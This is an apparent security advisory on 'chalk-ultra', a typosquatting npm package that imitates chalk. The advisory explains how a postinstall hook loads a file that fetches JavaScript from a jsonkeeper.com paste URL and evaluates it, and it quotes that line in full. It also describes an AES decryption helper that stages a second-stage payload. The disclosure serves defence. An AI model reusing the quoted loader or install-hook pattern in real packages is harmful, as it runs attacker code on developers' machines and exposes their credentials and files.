chalk-ultra @12.0.15

Summary

chalk-ultra is published under a name that mimics the widely-used chalk package, but its main is a verbatim copy of nodemailer source and its package.json declares "postinstall": "node lib/utils/index.js" . The postinstall path detaches into lib/utils/smtp-connection/index.js , which executes require("axios").get("https://jsonkeeper.com/b/OMNQZ").then(r=>new Function("require",r.data.cookie)(require)) — fetching JavaScript from a public, mutable paste host and evaluating it via new Function with the installer's require and full process privileges at install time. A sibling file lib/utils/smtp-connection/parse.js exports an AES-256-CBC decryption helper with a hardcoded key ( 1c7631ac...0566 ) and IV ( cf17723e...39d6 ), pre-staged to decode encrypted strings handed back by the remote second-stage payload. Any developer running npm install chalk-ultra executes whatever JavaScript the attacker is currently hosting at the jsonkeeper.com URL, with the installer's network access, environment variables, credentials, and filesystem.

Source: amazon-inspector (9a219b45c3fdcdb883eeb2c7e74d20060af2c788865e7925f911e40276dcd631)